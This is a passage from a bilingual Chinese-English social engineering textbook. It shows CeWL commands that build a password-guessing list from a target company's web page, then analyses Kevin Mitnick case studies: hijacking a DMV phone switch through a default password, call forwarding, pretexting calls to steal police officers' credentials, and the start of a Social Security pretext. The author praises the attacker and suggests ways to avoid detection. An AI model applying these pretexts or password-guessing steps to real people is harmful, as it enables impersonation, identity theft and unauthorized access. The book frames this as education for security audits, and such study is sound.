代理:要发送的用户代理 --no-words, -n:不输出单词表 --meta, -a 文件:

agent: useragent to send --no-words, -n: don’t output the wordlist --meta, -a file:

 

包括元数据,可选输出文件--email,-e 文件:包括电子邮件地址,

include meta data, optional output file --email, -e file: include email addresses,

 

可选输出文件--meta-temp-dir 目录:临时目录,默认/tmp -v:

optional output file --meta-temp-dir directory: the temporary directory,default /tmp -v:

 

详细 URL:要蜘蛛访问的网站。

verbose URL: The site to spider.

 

root@bt:/pentest/passwords/cewl# ./cewl.rb -d 1 -w pass.txt http://www.targetcompany.com/about.php

root@bt:/pentest/passwords/cewl# ./cewl.rb -d 1 -w pass.txt http://www.targetcompany.com/about.php

 

root@bt:/pentest/passwords/cewl# cat passwords.txt |wc -l 430

root@bt:/pentest/passwords/cewl# cat passwords.txt |wc -l 430

 

root@bt:/pentest/passwords/cewl#

root@bt:/pentest/passwords/cewl#

 
 

本次会话使用 CeWL 针对目标公司,仅在其网站的一个页面上就生成了 430 个潜在密码供尝试。

Using CeWL against a target company, this session generated 430 potential passwords to try from just one page on their web presence.

 

CUPP 和 CeWL 只是两种可用的工具,它们可以帮助分析和生成潜在密码列表。一个有趣的练习是使用您自己的信息运行其中一个工具,看看您使用的密码是否在生成的列表中。这可能会让您非常清醒,并让您非常重视密码安全。

CUPP and CeWL are just two tools at your disposal to help profile and generate lists of potential passwords. An interesting exercise is to run one of these tools using your own information and see if any passwords you use are in the lists generated. It can be very sobering and make you want to take password security very seriously.

 

概括

Summary

 

工具是社会工程学的一个重要方面,但工具并不能造就社会工程学。单靠工具是无用的,但知道如何利用和利用该工具却非常宝贵。

Tools are an important aspect of social engineering, but they do not make the social engineer. A tool alone is useless, but the knowledge of how to leverage and utilize that tool is invaluable.

 

如果本章中有一个主题引起共鸣,那就是熟能生巧。无论你使用的是电话、基于软件的工具、网络还是其他间谍工具,练习如何使用它们都是成功的关键。例如,在使用电话进行社会工程时,你可以使用欺骗技术甚至语音转换技术,虽然拥有所有这些伟大的技术令人惊叹,但如果你打电话时听起来过于照本宣科、紧张不安,或者毫无准备和无知,那么社会工程成功的所有希望都将破灭,而且很可能任何可信度也会消失。这一原则可以追溯到非常精通伪装。你试图冒充的人会怎么说话?他会说什么?他会怎么说?他会拥有什么知识?他会要求什么信息?

If one overwhelming theme in this chapter resounds, it is that practice makes perfect. Whether you are using the phone, software-based tools, the web, or other spy gadgets, practicing how to utilize them is essential to success. For example, when using the phone for social engineering, you can use spoofing technologies or even voice-changing technologies, and while having all this great technology is amazing, if you make a call and sound too scripted, nervous and jittery, or unprepared and unknowledgeable, then all hope for social engineering success is lost and most likely any credibility, too. This principle goes back to being very well versed in pretexting. How would the person you are trying to impersonate talk? What would he say? How would he say it? What knowledge would he possess? What information would he ask for?

 

无论社会工程师使用软件工具、硬件工具还是两者,花时间了解每个工具和每个功能的来龙去脉都可以决定审计的成功与否。

Whether the social engineer uses a software tool, hardware tool, or both, taking the time to learn the ins and outs of each tool and each feature can make or break the success of the audit.

 

工具可以节省大量审计时间,还可以填补审计员可能存在的任何缺陷。当您分析第 8 章中的案例研究时,这种动态就会变得明显。

Tools can take substantial time off audits and they can also fill in any deficiency gaps an auditor may have. This dynamic becomes apparent as you analyze the case studies in Chapter 8.

 

第八章

Chapter 8

 

案例研究:剖析社会工程师

Case Studies: Dissecting the Social Engineer

 

最好的安全是通过教育。

The best security is through education.

 

—马蒂·阿哈罗尼

—Mati Aharoni

 

本书中,我将逐一介绍成为一名优秀社会工程师的各个方面。将本书中的信息付诸实践,可以让社会工程师成为一股不可忽视的力量。

Throughout this book I go through each aspect of what makes a great social engineer. Putting the information in these pages into play can make a social engineer a force to be reckoned with.

 

在学校里,学生会回顾历史,了解什么该做,什么不该做。历史是一个很好的工具,可以让我们了解过去哪些事情是有效的以及为什么有效。它可以告诉我们我们要去哪里以及如何到达那里。

In school, students review history to learn what should or should not be done. History is a great tool for educating us about what things have worked in the past and why. It can tell us where we are going and how we can get there.

 

社会工程的历史也大同小异。纵观商业史,人们一直在进行诈骗和盗窃。人们毕生致力于帮助抵御这些邪恶势力。

Social engineering history is not so different. Throughout the history of business, people have been there to scam and steal. People have devoted their lives to helping secure against those bad forces.

 

讨论专业社会工程师攻击的各个方面通常很困难,因为它们要么是非法进行的,要么由于客户合同而无法公开讨论。幸运的是,世界著名的社会工程师和计算机安全专家凯文·米特尼克 (Kevin Mitnick) 发表了许多他的故事供我们阅读。我从他的书《欺骗的艺术》中摘录了其中一些故事。

Discussing the aspects of professional social engineer attacks is often difficult because they were either done illegally or cannot be openly discussed due to client contracts. Fortunately, Kevin Mitnick—world famous social engineer and computer security expert—has published many of his stories for our reading pleasure. I have taken some of these stories from his book The Art of Deception.

 

在本章中,我从米特尼克的书中选取了两个最著名的故事,并简要回顾了凯文所做的事情,分析了他所使用的社会工程学方面,并讨论了每个人可以从中学到什么。

In this chapter I pick two of Mitnick’s most famous stories from his books and give a brief recap of what Kevin did, analyzing what aspects of social engineering he used and discussing what everyone can learn from it.

 

在分析了这两个账户之后,我又分析了我自己的两个账户,这两个账户展示了获取信息是多么容易,以及利用这些信息可以多么容易地危害整个公司。最后,我将披露两个“绝密”故事,我甚至不能提及它们的来源,但正如你所看到的,你将从这些账户中学到很多东西。我的目标是向你展示即使是一点点信息也会有多危险,以及它们在熟练的社会工程师手中会有多大的破坏力。同时,你会看到社会工程师可以从过去的成功和失败中吸取教训,以提高他们自己的技能。

After dissecting those two accounts I do the same with two of my own accounts that demonstrate the ease with which you can obtain information and how easily you can use the information to compromise an entire company. Finally, I will disclose two “top-secret” stories whose sources I can’t even mention, but as you will see, you will learn a lot from these accounts. What I am aiming to accomplish is to show you how dangerous even little bits of information can be, and how devastating they can be in the hands of a skilled social engineer. At the same time, you will see where a social engineer can learn from past successes and failures to enhance their own skill set.

 

让我们从第一个案例研究开始。

Let’s get started with the first case study.

 

米特尼克案例研究 1:入侵 DMV

Mitnick Case Study 1: Hacking the DMV

 

凯文·米特尼克是众所周知的世界上最臭名昭著的社会工程师之一。他曾实施过一些世界上最大胆、最著名的攻击——这里讨论的攻击尤其如此。

Kevin Mitnick is widely known as one of the world’s most notorious social engineers. He has performed some of the boldest and most famous exploits in the world—and the exploit examined here is especially so.

 

驾驶执照通常可用于获取有关人员的信息。有了目标的驾驶执照号码,社会工程师便可获得各种个人信息。但是,没有免费服务可让个人获取这些个人信息。社会工程师或私人调查员必须付出一些努力才能获得这些信息,然后将其用于目标。

A driver’s license can often come in handy for obtaining information on people. Having the target’s driver’s license number can allow a social engineer to gain all sorts of personal information. However, no free services exist that allow a person to gain access to this personal information. A social engineer or private investigator must go through some lengths to be able to obtain and then use this information on a target.

 

凯文·米特尼克 (Kevin Mitnick) 在他的《欺骗的艺术》一书中讲述了一个故事,他称之为“反向刺痛”。以下部分提供了该故事的一些背景信息和分析。

Kevin Mitnick, in his book The Art of Deception, has a story he called “The Reverse Sting.” The following sections provide some background information and analysis of this account.

 

目标

The Target

 

在米特尼克最精彩的故事之一中,他讨论了“埃里克”如何利用非公开的机动车管理局 (DMV) 和警察系统来获取人们的驾照号码。他经常需要获取目标的驾照信息。埃里克有一种方法可以获取这些信息,但他担心反复拨打社交工程电话会导致致电 DMV 毫无用处或让警方发现他的行径。

In one of Mitnick’s greatest stories, he discusses how “Eric” wanted to use the non-public Department of Motor Vehicles (DMV) and police systems to obtain people’s driver’s license numbers. He regularly needed to obtain license information on targets. Eric had a method of obtaining this information but feared repeated social engineering calls would render calling the DMV useless or alert the police to his ways.

 

他需要一种不同的方法来访问 DMV 的网络,而且他知道 DMV 的运作方式,他知道如何做到这一点。他的目标是双重的——不仅是 DMV,而且警察也会帮助他(当然,在不知情的情况下)实现获取这些信息的目标。

He needed a different method to access the DMV’s network and with some knowledge of the how the DMV works he knew just how to do it. His target was twofold—not only the DMV but also the police would assist him (of course, without knowing it) in accomplishing his goal of obtaining this information.

 

故事

The Story

 

Eric 知道 DMV 可以将机密信息提供给保险公司、私人侦探 (PI) 和其他某些团体。每个行业只能访问某些类型的数据。

Eric knew that the DMV could give privileged information to insurance agencies, private investigators (PIs), and certain other groups. Each industry has access to only certain types of data.

 

保险公司和私家侦探掌握的信息不同,而执法人员可以掌握所有信息。埃里克的目标是掌握所有信息。

An insurance company is privy to different information than a PI, whereas a law enforcement agent can get it all. Eric’s goal was to get all the information.

 

获取未公开的车管所电话号码

Obtaining an Unpublished DMV Phone Number

 

Eric 采取了一些措施,真正证明了他出色的社交工程技能。首先,他拨打了电话信息,询问了 DMV 总部的电话号码。当然,他得到的电话号码是公开的,他想要的是一些能让他更深入的信息。

Eric took a few steps that really proved his excellent social engineering skills. First he called telephone information and asked for the phone number for DMV headquarters. Of course, the number he was given was for the public and what he wanted was something that would get him deeper.

 

然后他打电话给当地警长办公室,要求联系电传打字机,这是向其他执法机构发送和接收通讯的办公室。当他到达电传打字机部门时,他向对方询问执法部门致电 DMV 总部时使用的电话号码。

He then called the local sheriff’s office and asked for Teletype, which is the office where communications are sent to and received by other law enforcement agencies. When he reached the Teletype department, he asked the person for the number that law enforcement would use when calling the DMV headquarters.

 

现在我不知道你是怎么想的,但这似乎会失败。它几乎确实失败了:

Now I don’t know about you, but that seems like it would fail. It just about did:

 

“你是谁?”他被问到

“Who are you?” he was asked

 

他必须迅速思考并回答:“我是阿尔。我刚才拨打的是 503-555-5753。”

He had to think quickly and responded, “This is Al. I was calling 503-555-5753.”

 

他所做的只是给出一个区号和基号相同的随机号码,并编造最后四位数字。然后他就闭嘴了。警官做了一些假设:

All he did was give a random number with the same area code and base number and made up the last four digits. Then he just shut up. The officer made some assumptions:

 
 
     
  • 他是内部人员,已经拥有非公共区域(电传打字机)的号码。
  • He was internal and already had the number for a non-public area (Teletype).
  •  
     
  • 他几乎掌握了车辆管理处的所有电话号码。
  • He had almost all the number for the DMV.
  •  
 

警官牢牢记住了这两个事实,他认为埃里克被允许进入,并给了他号码。但埃里克想要的不只是一个号码;他想要尽可能多的号码。

With those two facts firmly in the officer’s mind he assumed that Eric was allowed in and gave him the number. Eric wanted more than one number, though; he wanted as many as he could get his hands on.

 

要实现这一目标,黑客需要更深入的攻击——多层次、多层面、多途径的攻击。这将是史诗级的。

Accomplishing this goal would require an even deeper hack—a multi-level, multi-faceted attack with many different avenues. It would be of epic proportion.

 

获得国家电话系统的访问权限

Gaining Access to the State’s Phone System

 

埃里克拨打了车管所给他的电话号码。他告诉车管所代表,他是北电公司的,需要找一名技术人员,因为他使用 DMS-100,这是一种使用频率很高的交换机。

Eric called the number he was given to get into the DMV. He told the DMV representative he was from Nortel and needed to speak to a technician because he worked with the DMS-100, a much-used switch.

 

当他与技术人员通话时,他声称自己是德州 Nortel 技术援助中心的,并解释说他正在更新所有交换机。更新将通过远程方式完成,技术人员无需做任何事情,只需提供交换机的拨入号码,这样 Eric 就可以直接从技术援助中心执行更新。

When he was on with the technician he claimed to be with the Texas Nortel Technical Assistance center and explained he was updating all switches. It would be done remotely and the technician wouldn’t need to do anything except provide the dial-in number to the switch so Eric could perform the updates directly from the Technical Assistance center.

 

这个故事听起来完全可信,所以技术人员同意了,并向 Eric 提供了他所要求的所有信息。有了这些信息,他现在可以直接拨打该州的电话交换机之一。

This story sounded completely believable, so the technician complied, giving Eric all the info he requested. Armed with this information he could now dial directly into one of the state’s telephone switches.

 

获取密码

Getting a Password

 

下一个障碍是可以阻止整个黑客攻击的障碍——获取密码。 DMV 使用的 Nortel 交换机有密码保护。根据过去使用 Nortel 交换机的经验,Eric 知道 Nortel 使用默认用户帐户 NTAS。 Eric 随后拨入几次,尝试他遇到的标准密码:

The next hurdle was one that could have stopped this whole hack dead in its tracks—getting passwords. The Nortel switches that the DMV used were password protected. From past experience in using Nortel Switches Eric knew that Nortel uses a default user account, NTAS. Eric then dialed in several times trying the standard passwords he has encountered:

 
 
     
  • NTAS—失败
  • NTAS—fail
  •  
     
  • 账户名称—失败
  • Account name—fail
  •  
     
  • 帮助者—失败
  • Helper—fail
  •  
     
  • 补丁—失败
  • Patch—fail
  •  
     
  • 更新 — 成功
  • Update—SUCCESS
  •  
 

哇,真的吗?密码是update。他现在完全控制了交换机和与其连接的所有线路。他查询了目标电话线路。他很快发现,19 条电话线路都属于同一个部门。

Wow, really? The password was update. He now had full control over the switch and all lines connected to it. He queried the telephone lines that were his target. He quickly found out that 19 phone lines went to the same department.

 

在检查了交换机的一些内部设置后,他发现交换机的编程是搜索 19 条线路,直到找到一条不忙的线路。他选择了 18 条线路,输入了标准转接代码,该代码为该电话线路添加了呼叫转接命令。

After checking some of the internal setup of the switch he found out that the switch was programmed to hunt through the 19 lines until it found one that was not busy. He picked line 18 and entered the standard forwarding code that added a call forwarding command to that phone line.

 

埃里克买了一部便宜的预付费手机,可以轻松处理。他输入了该号码作为第 18 条线路响铃时的转接号码。基本上,一旦 DMV 变得足够繁忙,17 条线路上有人,第 18 个电话就不会响到 DMV,而是响到埃里克的手机上。

Eric bought a cheap, pre-paid cell phone that could be disposed of easily. He entered that number as the number to forward to when line 18 was rung. Basically, as soon as the DMV got busy enough to have people on 17 lines, the 18th call would not ring to the DMV, but to Eric’s cell phone.

 

没过多久,事情就开始发生了。第二天早上 8 点左右,手机开始响起。每次都是警察在寻找有关嫌疑人的信息。他会在家里、午餐时间、车里接听警察的电话——无论他在哪里,他都会假装是 DMV 代表。

It wasn’t too long until that started happening. Around 8:00 a.m. the next morning the cell phone started to ring. Each time, it was a police officer looking for information on a person of interest. He would field calls from police at his house, at lunch, in the car—no matter where he was he pretended to be the DMV representative.

 

让我本人大笑的是,电话里是这样说的:

What made me personally get a good laugh was how the calls are reported as going:

 

手机响了,埃里克就会说:“DMV,有什么可以帮您的吗?”

The cell phone would ring and Eric would say, “DMV, may I help you?”

 

“我是安德鲁·科尔侦探。”

“This is Detective Andrew Cole.”

 

“您好,侦探先生,今天我能为您做些什么?”

“Hi Detective, what can I do for you today?”

 

“我需要驾照 005602789 上的 Soundex。”

“I need a Soundex on driver’s license 005602789.”

 

“当然,让我调出记录。”他一边模拟在电脑上工作,一边问了几个问题:“科尔侦探,你是哪个机构的?”

“Sure, let me bring up the record.” While he simulated working on a computer he asked a couple questions: “Detective Cole, what is your agency?”

 

“杰斐逊县。”

“Jefferson County.”

 

随后,埃里克会提出以下问题:“您的请求者代码是多少?”“您的驾照号码是多少?”“您的出生日期是多少?”

Eric would then launch the following questions: “What is your requestor code?” “What is your driver’s license number?” “What is your date of birth?”

 

当警官提供所有个人信息时,埃里克会假装核实所有信息。然后他会假装确认,并询问他在通话中需要哪些详细信息。他会假装查找姓名和其他信息,然后说:“我的电脑又坏了。对不起,侦探,我的电脑已经坏了整整一周了。你介意再打一次电话,让另一个职员帮你吗?”

As the officer would give all his personal information, Eric would pretend to be verifying it all. Then he would feign confirmation and ask what details he needed on his call. He would pretend to look up the name and other information then say, “My computer just went down again. Sorry, detective, my computer has been on the blink all week. Would you mind calling back and getting another clerk to help you?”

 

我相信,这对警官来说会有点恼火,但这样可以解决所有问题。与此同时,埃里克现在掌握了那位警官的身份。他可以用这些信息做很多事情,但主要是在需要时从 DMV 获取信息。

This would be a little irritating, I am sure, for the officer, but it would tie up all the loose ends. In the meantime, Eric now owned the identity of that officer. He could use this information for many things, but mostly to obtain information from the DMV whenever he needed.

 

他花了几个小时收集 DMV 信息,然后拨回交换机并禁用呼叫转移;现在他掌握了一份有用的信息清单。

He did his DMV information gathering for a few hours then called back into the switch and disabled call forwarding; he now had a juicy list of information in his possession.

 

在这次黑客攻击后的几个月里,埃里克可以轻松地拨回电话,启用呼叫转移开关,收集一些警官信息,禁用呼叫转移,然后使用这些警察证件获取有效的驾驶执照,然后将其出售给私人调查员或其他不会询问他如何获得这些信息的人。

For months after this hack, Eric could easily dial back in, enable the call forwarding switch, collect a number of officer information facts, disable call forwarding, and then use those police credentials to obtain valid driver’s licenses that he would sell to private investigators or others who would not ask how he obtained this information.

 

将 SE 框架应用于 DMV 黑客攻击

Applying the SE Framework to the DMV Hack

 

在故事中,凯文指出了埃里克所做的一些事情以及使他成功的态度,比如不害怕或不感到不自在与警察交谈,以及能够在陌生的地方找到路。

In the story, Kevin identified some things that Eric did and attitudes he had that made him successful, such as not being afraid or uncomfortable talking to police and being able to find his way around unfamiliar areas.

 

您还可以确定 Eric 使用了社会工程框架的哪个部分以及他是如何使用它的。

You can also identify what part of the social engineering framework Eric used and how he used it.

 

例如,任何成功的社会工程审计或攻击的第一步都是信息收集。从这个账户中你可以看出,埃里克在攻击之前一定做了很多功课。他对电话系统、车管所的运作方式以及他想要渗透的流程的一般运作方式非常了解。我不确定这次攻击发生多久了,但现在由于互联网的存在,发动这样的攻击变得更加容易。这是一个信息收集的金矿。就在几年前,有人想出了一种方法来破解 Tranax ATM,几周之内,包含如何执行攻击的分步过程的手册就出现在了互联网上。

For example, the first step in any successful social engineering audit or attack is information gathering. In this account you can see that Eric must have really done his homework prior to the attack. He knew a lot about the phone system, the way the DMV operates, and the general workings of the process he wanted to infiltrate. I am not sure how long ago this attack occurred, but nowadays making an attack like it is even easier due to the Internet. It is a goldmine for information gathering. Just a couple of years ago someone figured out a hack for a Tranax ATM, and within a few weeks manuals containing step-by-step processes of how to perform the attack were available on the Internet.

 

此外,正如本书前面提到的,选择一个模仿你在现实生活中所做的事情或你过去所做的事情的借口可以增加你成功的机会。其威力在于,因为借口对你来说更“现实”,所以它可以帮助你收集信息并突破目标。埃里克似乎对这个领域非常了解。

Also, as mentioned previously in this book, choosing a pretext that mimics what you do in real life or things you did in the past can increase your chance of success. The power lies in the fact that because the pretext is more “realistic” to you it helps you gather information as well as breach the target. Eric seemed to have a very intimate knowledge of this field.

 

您可能还记得,该框架的下一部分是诱导,即能够巧妙地设计问题以获取信息或获得您想要的东西。埃里克巧妙地诱导了信息。在与警察通电话时,埃里克使用诱导证明了他的身份和他所说的身份,并且非常了解他的“工作”。他了解行话,并会问一些必须回答的常规问题。事实上,不问这些问题可能比问这些问题更能引起警觉。这就是良好诱导策略的力量。

As you may recall, the next part of the framework is elicitation, or being able to cleverly craft questions to obtain information or access to something you want. Eric elicited information masterfully. When on the phone with the police, Eric’s use of elicitation served as the proof that he was who he said he was and knew his “job” well. He knew the lingo and asked routine questions that had to be answered. As a matter of fact, not asking those questions would have probably caused more of an alarm than by asking them. That is the power of good elicitation tactics.

 

Eric 很早就知道他必须获得某些电话号码才能实施攻击。他没有试图解释为什么需要某些信息,而是使用了第 3 章中提到的假设性结尾,并提出了一些问题,基本上是说:“我现在应该得到这些答案,所以告诉我我在问什么。”这是另一个强有力的诱导的例子;通过仔细分析他的方法,你可以学到很多东西。

Early on Eric knew he had to obtain certain phone numbers to perform the attack. Instead of trying to explain why he needed certain information, he used an assumptive close as mentioned in Chapter 3, and asked questions that basically stated, “I deserve these answers now, so tell me what I am asking.” This is another example of powerful elicitation; you can learn a lot from analyzing his methods closely.

 

大多数成功的攻击都会使用大量的借口。这个账户也不例外。埃里克不得不在这个攻击媒介中想出一些借口。为了实现目标,他不得不多次转换策略。埃里克冒充执法人员(他做得非常好)令人印象深刻,但请记住,这种做法在美国是高度违法的。你可以从埃里克使用的过程和方法中学到很多东西,但要谨慎应用它们。即使是在付费的社会工程审计中,冒充执法人员也是违法的。

Most good attacks also include a very high amount of pretexting. This account was no exception. Eric had to develop a few pretexts in this attack vector. He had to switch gears many times to accomplish his goals. As impressive as it is that Eric had to impersonate law enforcement (which he did very well), keep in mind that this practice is highly illegal in the United States. You can learn much from the process and methods Eric used, but be cautious how you apply them. Even in a paid social engineering audit, impersonating a law enforcement agent is illegal.

 

了解当地法律——这就是教训——否则不要害怕被抓。尽管这是违法的,但通过分析 Eric 在这个黑客事件中的态度,你可以学到很多东西。他总是被控制住。当他以 DMV 特工为借口时,他能够使用诱导作为证据。当他以警察为借口时,他的举止、声音和措辞都支持这个借口。对于很多人来说,转换方式可能很难,所以最好在“上线”之前先练习一下。

Know your local laws—that is the lesson—or don’t be afraid to be caught. Despite the fact that it is illegal, you can learn a lot from analyzing Eric’s attitude in this hack. He was always collected. When he put on the pretext of the DMV agent he was able to use elicitation that served as the proof. When he put on the police pretext, his demeanor, voice, and phrases all backed up the pretext. Switching gears can be hard for many people, so it is best to practice before you go “live” with this.

 

埃里克的借口很充分,他把这些借口伪装得十分到位,尤其是当他必须扮演 DMV 特工并接听真正的警察电话时。在许多情况下,他很容易失去本性,但他似乎表现得相当好。

Eric’s pretexts were solid and he did a masterful job at holding them together, especially when he had to act as a DMV agent and field real calls from police. In many circumstances he could have easily fallen out of character but he seemed to hold it together quite well.

 

很多用于社会工程学心理方面的技术,比如眼神暗示和微表情,在这次攻击中没有使用,因为这次攻击主要是通过电话进行的。不过,埃里克确实不得不利用该框架的某些方面,比如建立融洽关系、NLP(神经语言编程)和思维模式。

Many of the techniques used for the psychological aspects of social engineering, such as eye cues and microexpressions, were not used in this attack because it happened mostly over the phone. Eric did have to utilize certain aspects of the framework, though, such as rapport building, NLP (neurolinguistic programming), and modes of thinking.

 

埃里克似乎天生就善于建立融洽的关系。他平易近人,随和,似乎不害怕“如果”,并且能够对自己的能力充满信心。他摆出一副声音,摆出一副谈话架势,让电话另一端的人有充分的理由相信他,没有理由不相信他。

Eric seemed to be a natural at building rapport. He was personable and easygoing, he seemed to not be afraid of the “what ifs,” and was able to be and act confident in his abilities. He posed his voice and his conversation in a way that gave the person on the other end of the phone all the reason to trust him and no reason to not believe him.

 

埃里克的审讯和采访技巧令人印象深刻,甚至对经验丰富的执法人员也使用过这些技巧。他非常成功地运用了这些技巧,以至于没有人发现他的手段,并获得了他想要的所有信息。

Eric used impressive interrogation and interview tactics, even using them on law enforcement agents who are experienced in interview tactics. He used those tactics so successfully that he was undetected in his methods and obtained all the information he wanted.

 

埃里克似乎也非常精通和善于使用影响策略。这次攻击中最引人注目的可能是他要求警官回电联系不同的 DMV 人员。这可能让警官很恼火,但让这一策略成功的原因在于埃里克先“给”了办公室一些东西也就是说,他“核实”了警官需要的数据,而当他应该给警官提供最后一条信息时,“计算机”冻结了。

Eric also seemed to have an excellent grasp of and ability to use influencing tactics. Probably one of the most noticeable in the attack was when he asked the police officer to call back to get a different DMV agent. This was probably annoying for the officer, but what made the tactic successful is that Eric “gave” the office something first. That is, he “verified” the data the officer needed and when he was supposed to give the officer final piece of info is when the “computer” froze.

 

埃里克运用一些有影响力的规则很容易就能让警官们遵守。

Applying some rules of influence Eric was easily able to get the officers to comply.

 

与埃里克的借口密切相关的是他成功使用框架的能力。提醒你一下,框架就是通过定位你自己和你的故事,让目标与你的想法保持一致,使它们变得可信。这是借口拼图中的一个重要部分,它使你脱颖而出,并向目标证明你确实是你所说的那个人。埃里克的借口很棒,也很可信,但真正让他们信服的是他使用的框架。他的框架会根据他谈话的对象而变化。有一次,他必须确保另一端的警官会给他电传打字机号码;在另一个电话中,他必须是一位知识渊博、技术娴熟的 DMV 探员。

Closely linked to Eric’s pretext was his ability to use framing successfully. To refresh your memory, framing is bringing the target inline with your thinking by positioning yourself and your stories to make them believable. It is an important piece of the pretext puzzle that makes you stand out and prove to the target you certainly are who you say you are. Eric’s pretexts were great and believable, but what really sold them were the frames that he used. His frame changed depending on who he was talking to. At one point he had to make sure the officer on the other end would give him the Teletype number; on the other call he had to be a knowledgeable and skilled DMV agent.

 

埃里克利用框架让自己变得可信,他假设自己会得到他所要求的信息,在交易中毫不畏惧,自信地索要他“认为”应该得到的信息。所有这些态度都让目标接受他的借口,并允许他做出自然的反应。

Eric made himself believable using framing by assuming he would get the information he asked, showing no fear in his dealings, and confidently asking for information he “felt” he was owed. All these attitudes framed the target to accept his pretext and allow for natural responses.

 

如您所见,通过分析 Eric 的社会工程攻击,您可以学到很多东西。我们只能假设 Eric 要么已经练习过所有这些方法,要么进行了几次演练,以了解他在攻击中使用的内部系统。

As you can see, you can learn much by analyzing Eric’s social engineer attack. One can only assume that Eric either had practiced all these methods or had a few dry runs to know all he did about the internal systems used in the attack.

 

Eric 的方法对他来说很有效,而且很成功,但我本应该采取一些额外的预防措施。例如:

Eric’s methods worked out for him and were successful, but I would have taken a couple extra precautions. For example:

 
 
     
  • 当他接听 DMV 电话时,我会确保只在“办公室”时转接号码。我会设置一个办公区,设置一些背景办公室噪音,并准备好适当的用品来记录我需要的所有信息,以避免服务员或朋友揭穿我的身份。
  • When he was fielding DMV calls, I would have made sure I forwarded the number only when I was in the “office.” I would have set up an office area with some background office noises and had the proper supplies to take down all the information I needed to avoid the risk of a waitress or friend blowing my cover.
  •  
     
  • 虽然一次性手机对于追踪来说是个好主意,但另一种方法是将该号码转接到 Google Voice 或 Skype 号码。我不太相信手机信号,没有什么比断线或信号微弱、充满静电更能毁掉演出的了。
  • Although a disposable cell phone is a good idea for tracing purposes, another technique is to have that number forward to a Google Voice or Skype number. I tend not to trust cell signals, and nothing could have ruined the gig faster than having the call drop or having a weak, static-filled signal.
  •  
 

除了这些项目之外,在这个 hack 中很难再有太大改进。Eric 通过使用框架中的许多才能和技能来实现他的目标,确保一切顺利,他做得非常出色。

Besides these items one can’t improve much in this hack. Eric did a superb job at making sure it was done right by using many of the talents and skills in the framework to accomplish his goal.

 

米特尼克案例研究 2:入侵社会保障管理局

Mitnick Case Study 2: Hacking the Social Security Administration

 

米特尼克提到了一个名叫基思·卡特的人,他是一个名声不太好的私家侦探,被雇来调查一名男子向即将分居的妻子隐瞒资金的情况。卡特的妻子曾资助过他的企业,后来发展成为一家价值数百万美元的公司。

Mitnick mentions a man he called Keith Carter, a less-than-honorable private investigator hired to do some digging into a man who was hiding funds from his soon-to-be-estranged wife. She had funded his venture, which had grown into a multimillion-dollar company.

 

离婚案几乎尘埃落定,但女方的律师需要找到“隐藏资产”。这种攻击媒介很有趣,因为与第一个案例研究一样,这个故事采用了一种非常隐蔽的情报收集方法。

The divorce was almost settled but the woman’s attorneys needed to find the “hidden assets.” This attack vector is interesting because, as in the first case study, the story follows a very shady method of gathering intelligence.

 

目标

The Target

 

目标是找到丈夫“乔·约翰逊”的资产,但这并不是实际社会工程攻击的目标。为了获得有关乔的信息,私家侦探基思必须侵入社会保障局 (SSA)。

The target was to find the assets of the husband, “Joe Johnson,” but that wasn’t the target used for the actual social engineering attack. To obtain information on Joe, the private investigator, Keith, had to hack the Social Security Administration (SSA).

 

在社会工程审计中,这种情况经常出现。本节介绍了他为实现这一目标所用的一些方法,但足以说明,入侵 SSA 是一种非常危险的行为。随着故事的展开,您将看到这次入侵有多么危险。

Many times in a social engineering audit this option will present itself. This section covers some of the methods he used to accomplish this goal, but suffice it to say that hacking the SSA is a very slippery slope. As the story unfolds you will see how dangerous this particular hack was.

 

故事

The Story

 

乔·约翰逊娶了一位非常富有的妻子。他明知故犯地用妻子的数万美元投资于他的一个想法。这个想法发展成为一个价值数百万美元的组织。

Joe Johnson was married to a very wealthy woman. He had knowingly used tens of thousands of her dollars to invest in one of his ideas. That idea grew into a multimillion-dollar organization.

 

事情发展到这一步,他们的婚姻并不牢固,所以他们决定离婚。在离婚诉讼期间,即将成为前妻的约翰逊“知道”他藏匿了钱财,试图不让这些钱出现在离婚协议中。

As things happen, their marriage was not too solid, so they decided to divorce. During the divorce proceedings, soon to be ex–Mrs. Johnson “knew” he was hiding his money, trying to keep it out of the divorce settlement.

 

她雇佣了私家侦探基思 (Keith),他是一个不太道德的人,为了获取案件所需的信息,他不介意触及合法与非法的界限。

She hired Keith, the private investigator who was a less-than-ethical guy who didn’t mind riding the edge of what was legal and what was not to obtain the information he needed to make the case.

 

当基思坐下来分析这个案件时,他决定从社会保障局入手。他认为,只要他能获得乔的记录,他就能找到一些差异,然后把棺材钉上。他希望能够以乔的名义自由地给乔的银行、投资公司和离岸账户打电话。要做到这一点,他需要一些详细信息,这就是他走上入侵社会保障局之路的原因。

As Keith sat down to analyze the case he determined that a good starting point was the Social Security Administration. He thought that if he could just obtain Joe’s records he would be able to find some discrepancies and then nail his coffin shut. He wanted to be able to freely call Joe’s banks, investment firms, and offshore accounts pretexting as Joe. To do so he needed some detailed information, which is what led him to the path of hacking the Social Security office.

 

基思从收集基本信息开始。他上网找到了一份指南,其中介绍了社会保障局的内部系统及其内部术语和行话。在研究了这份指南并熟练掌握了行话后,他拨打了当地社会保障局的公开电话。接通后,他要求转接给索赔办公室。对话如下:

Keith began with basic information gathering. He went online and found a guide describing the SSA’s internal systems and their internal terminology and jargon. After studying that and having the jargon down pat he called the local public number of the Social Security office. When he got a live person he asked to be connected to the claims office. The conversation went like this:

 

“您好,我是 329 区办事处的格雷戈里·亚当斯。听着,我想联系一位理赔员,他负责处理一个以 6363 结尾的账户,我的号码是传真机上的。”

“Hi, this is Gregory Adams, District Office 329. Listen, I am trying to reach a claims adjuster who handles an account number that ends in 6363 and the number I have goes to a fax machine.”

 

“哦,那是Mod 3,号码是……”

“Oh, that is Mod 3, the number is…”

 

真的吗?这么简单?哇。几分钟后,他就得到了通常公众无法获得的内部办公电话的号码。现在到了最困难的部分。

Really? That easy? Wow. In a few moments’ time he gets the number of the internal office phones that the public normally cannot get. Now comes the hard part.

 

他必须给 Mod 3 打电话,换个借口,获取有关 Joe 的有用信息。周四早上,Keith 似乎已经制定好了计划。他拿起电话,拨通了 Mod 3 的号码:

He has to call Mod 3, change his pretext, and obtain useful information on Joe. Thursday morning comes around and it looks like Keith has his plan well laid out. He picks up the phone and dials the Mod 3 number:

 

“Mod 3。我是 May Linn Wang。”

“Mod 3. This is May Linn Wang.”

 

“王女士,我是监察长办公室的亚瑟·阿隆代尔。我可以叫您‘梅’吗?”

“Ms. Wang, this is Arthur Arondale, in the Office of the Inspector General. Can I call you ‘May’?”

 

“这是‘May Linn’,”她说。

“It’s ‘May Linn’,” she says.

 

